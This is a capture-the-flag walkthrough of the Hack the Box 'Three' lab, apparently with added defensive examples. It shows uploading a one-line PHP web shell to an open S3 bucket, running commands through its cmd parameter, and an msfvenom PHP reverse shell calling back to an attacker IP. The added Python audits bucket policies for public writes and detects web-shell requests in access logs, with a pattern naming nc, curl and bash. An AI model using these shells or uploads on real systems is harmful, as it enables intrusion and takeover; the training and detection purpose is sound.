Hack the Box Starting Point Tier 1: Three

Enumeration

Nmap

The Nmap scan shows that the target has OpenSSH running on port 22 and an Apache HTTP server on port 80.

nmap -sCV -Pn -T4 -p- 10.129.67.184

HTTP

Opened the target’s IP address in a browser. No clickable links.

From the contact field we can see a domain name, thetoppers.htb. Added the name to the /etc/hosts file, mapped to the target's IP address.

sudo nano /etc/hosts

Gobuster

Next, we will use Gobuster to find subdomains for the address thetoppers.htb.

Gobuster found a subdomain, s3.thetoppers.htb (it responds with status 404, which differs from the default virtual host's response).

gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb

Added the subdomain s3.thetoppers.htb to the /etc/hosts file to match the target’s IP address.

sudo nano /etc/hosts

Opened the address s3.thetoppers.htb in the browser and the page only has JSON: {"status": "running"}

Amazon S3

S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects. Source: https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html

We will use a tool called awscli to list the S3 objects.

Installed and configured the awscli tool. In the configuration prompts, entered the placeholder value "temp" in every field, since the target does not validate the credentials.

sudo apt update && sudo apt install awscli -y
aws configure

Listed S3 bucket items. We can see a directory .htaccess and a file index.php in the bucket.

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Using the browser plugin Wappalyzer, and from the presence of index.php, we can see that thetoppers.htb runs PHP. Next, we will create a PHP file called shell.php with the following content:
<?php system($_GET["cmd"]); ?>

echo '<?php system($_GET["cmd"]); ?>' > shell.php

The file calls PHP's system() function with the value of the cmd URL parameter, so whatever is passed in cmd is executed as a shell command on the target.

Uploaded the file shell.php to the S3 bucket thetoppers.htb.

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
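The upload only works because the bucket accepts anonymous writes. The following is an added example, not part of the original write-up, that audits a bucket policy document for Allow statements granting write actions to everyone. The two policies are constructed for illustration (the bucket name is taken from the write-up; the account ID and role name are placeholders); the hardened version keeps public reads but limits writes to one named role.

```python
"""Audit an S3 bucket policy for statements that let anonymous callers write objects.

Added example, not part of the original write-up. The policies below are
constructed; the bucket name thetoppers.htb comes from the write-up, the account
ID and role name are placeholders.
"""
import json
from fnmatch import fnmatchcase

# Actions that let a caller place, replace or remove content in the bucket.
WRITE_ACTIONS = ("s3:PutObject", "s3:PutObjectAcl", "s3:DeleteObject")


def _as_list(value):
    """IAM policy fields may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True when a statement's Principal covers everyone ("*" or {"AWS": "*"})."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for p in _as_list(principal.get("AWS")))
    return False


def _covers_write(action_pattern):
    """True when an Action entry (wildcards allowed, case-insensitive) covers a write action."""
    pat = action_pattern.lower()
    return any(fnmatchcase(w.lower(), pat) for w in WRITE_ACTIONS)


def find_public_writes(policy_json):
    """Return (Sid, Action) pairs for Allow statements that grant writes to anyone.

    Conditions are deliberately ignored: a conditioned public write is still
    worth a human look, so the check errs on the side of reporting it.
    """
    policy = json.loads(policy_json)
    findings = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        for action in _as_list(stmt.get("Action")):
            if _covers_write(action):
                findings.append((stmt.get("Sid", "<no Sid>"), action))
    return findings


# Constructed weak policy: anyone can read, and anyone can write or delete objects.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
        {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:PutObject", "s3:DeleteObject"],
         "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    ],
})

# Constructed hardened policy: public read stays, writes need a specific deploy role.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
        {"Sid": "DeployWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/DeployRole"},  # placeholder
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::thetoppers.htb/*"},
    ],
})


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, find_public_writes(doc))
```

The policy is only one of the places a bucket can be opened up: the bucket ACL and the account-level Block Public Access settings are separate controls, so a clean policy audit does not by itself prove the bucket is closed. On real AWS, `aws s3api get-bucket-policy` returns the document this function expects; the lab's S3 endpoint is a local stand-in and is not claimed to honour policies at all.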

Next, we can try to execute the ls command in the URL parameter using cmd, by typing in the address bar: http://thetoppers.htb/shell.php?cmd=ls

Successfully executed the ls command, because we were able to list the contents of the directory.

Captured the request with Burp Suite and sent it to the Repeater tab. Navigated back one directory and listed the contents with the command: ls+../

The root flag can be found in the file flag.txt. The content of the file flag.txt can be read with the command: cat+../flag.txt
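From the server side, each of those commands leaves a line in the Apache access log. The following is an added example, not part of the original write-up, that parses Apache combined-format log lines and flags requests to a .php path whose cmd-style parameter carries a shell command or path traversal. The log lines are constructed to mirror the requests made in this write-up, plus two benign ones that should not fire.

```python
"""Flag web-shell-style requests in Apache access logs.

Added example, not from the original write-up. The Apache combined log format
is assumed; the sample lines below are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Leading fields of the combined log format; referer and user-agent are not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Parameter names commonly used by one-line PHP web shells of the kind shown above.
SUSPECT_PARAMS = {"cmd", "exec", "command"}
# A bare shell utility at a token boundary, or a parent-directory traversal.
SHELL_TOKENS = re.compile(
    r'(^|[\s;|&])(ls|cat|id|whoami|uname|nc|bash|sh|wget|curl)([\s;|&]|$)|\.\./'
)


def parse_line(line):
    """Split one log line into fields; parse_qs already decodes '+' and %xx escapes."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def suspicious_param(entry):
    """Return (name, value) of the first shell-like parameter on a .php request, else None."""
    if not entry["path"].endswith(".php"):
        return None
    for name, values in entry["query"].items():
        if name.lower() not in SUSPECT_PARAMS:
            continue
        for value in values:
            if SHELL_TOKENS.search(value):
                return name, value
    return None


def find_webshell_requests(log_text):
    """Return (ip, path, param, value) for every line that looks like web-shell traffic."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        found = suspicious_param(entry)
        if found:
            hits.append((entry["ip"], entry["path"], found[0], found[1]))
    return hits


# Constructed sample log: the write-up's requests plus two benign lines.
SAMPLE_LOG = """\
10.10.14.76 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
10.10.14.76 - - [10/Mar/2024:12:00:05 +0000] "GET /shell.php?cmd=ls HTTP/1.1" 200 74 "-" "Mozilla/5.0"
10.10.14.76 - - [10/Mar/2024:12:00:09 +0000] "GET /shell.php?cmd=ls+../ HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.10.14.76 - - [10/Mar/2024:12:00:14 +0000] "GET /shell.php?cmd=cat+../flag.txt HTTP/1.1" 200 33 "-" "Mozilla/5.0"
10.10.14.76 - - [10/Mar/2024:12:01:00 +0000] "GET /reverse.php HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.0.2.10 - - [10/Mar/2024:12:02:00 +0000] "GET /search.php?q=cat+pictures HTTP/1.1" 200 500 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2024:12:02:30 +0000] "GET /index.php?cmd=hello HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
"""


if __name__ == "__main__":
    for hit in find_webshell_requests(SAMPLE_LOG):
        print(hit)
```

Note what this signature does not catch: the later request for reverse.php carries no parameter at all, so a parameter-based rule is blind to it. The reliable control for that case is on the file system rather than in the access log: alert when a new .php file appears in a bucket-backed or otherwise writable web root, and configure the web server not to execute scripts from directories that accept uploads.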

Reverse shell

In order to get a shell on the target we must first generate a PHP reverse shell file with msfvenom:

msfvenom -p php/reverse_php LHOST=10.10.14.76 LPORT=443 -f raw -o reverse.php

Uploaded the file reverse.php to the S3 bucket thetoppers.htb.

aws --endpoint=http://s3.thetoppers.htb s3 cp reverse.php s3://thetoppers.htb

Started a Netcat listener on port 443.

nc -lvnp 443

Call the address http://thetoppers.htb/reverse.php with curl or load it in a browser.

curl http://thetoppers.htb/reverse.php

Successfully received a reverse shell in the Netcat listener as the user www-data. The flag can be obtained from the directory /var/www.